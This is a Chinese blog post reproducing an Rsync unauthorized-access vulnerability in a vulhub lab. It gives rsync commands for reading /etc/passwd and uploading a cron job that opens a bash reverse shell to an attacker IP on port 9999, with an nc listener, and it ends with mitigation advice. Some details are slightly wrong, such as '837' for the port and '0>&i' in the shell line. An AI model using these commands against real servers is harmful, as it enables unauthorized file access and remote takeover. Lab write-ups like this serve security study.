Rsync未授权访问漏洞记录(影响范围:全版本,端口:873)
生活随笔
收集整理的這篇文章主要介紹了
Rsync未授权访问漏洞记录(影响范围:全版本,端口:873)
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
1. 漏洞介紹及危害
Rsync(remote synchronize)是一個遠程數據同步工具,可通過 LAN/WAN 快速同步多臺主機間的文件,也可以同步本地硬盤中的不同目錄。Rsync 默認允許匿名訪問,如果在配置文件中沒有相關的用戶認證以及文件授權,就會觸發隱患。Rsync 的默認端口為 837。
2. 漏洞復現
Rsync相關環境利用vulhub進行復現,vulhub安裝教程請自行百度
cd /vulhub/rsync/common docker-compose up -d3. 未授權訪問
#rsync rsync://{target_ip}/rsync rsync://192.168.2.85/ rsync rsync://192.168.2.85/src4. 任意文件下載
rsync rsync://192.168.2.85/src/etc/passwd ./成功下載/etc/passwd
5. 反彈shell
# 下載crontab配置文件 rsync rsync://192.168.2.85:873/src/etc/crontab ./該環境crontab中 17 * * * * root cd / && run-parts --report /etc/cron.hourly 表示每小時的第17分鐘執行run-parts --report /etc/cron.hourly # 寫入bash并賦權 vim nc chmod 777#bash內容:#!/bin/bash /bin/bash -i >& /dev/tcp/10.211.55.8/9999 0>&i# 最后將文件上傳至/etc/cron.hourly rsync -av nc rsync://192.168.2.85:873/src/etc/cron.hourly我這里上傳的位置非:rsync://192.168.2.85:873/src/etc/cron.hourly
而是:rsync://192.168.2.85:873/src/var/spool/cron/crontabs/當前用戶
# kali本地監聽9999端口 nc -lvnp 9999每小時第十七分鐘運行我們上傳的bash腳本,所以反彈shell需要等待
成功反彈shell
6. 防護措施
- 賬戶認證:正確配置認證用戶名及密碼。
- 權限控制:使用合理的權限。
- 網絡訪問控制:控制接入源ip。
- 數據加密傳輸等
總結
以上是生活随笔為你收集整理的Rsync未授权访问漏洞记录(影响范围:全版本,端口:873)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: windows下nc(netcat)的安
- 下一篇: DRDoS分布反射式拒绝服务攻击(什么是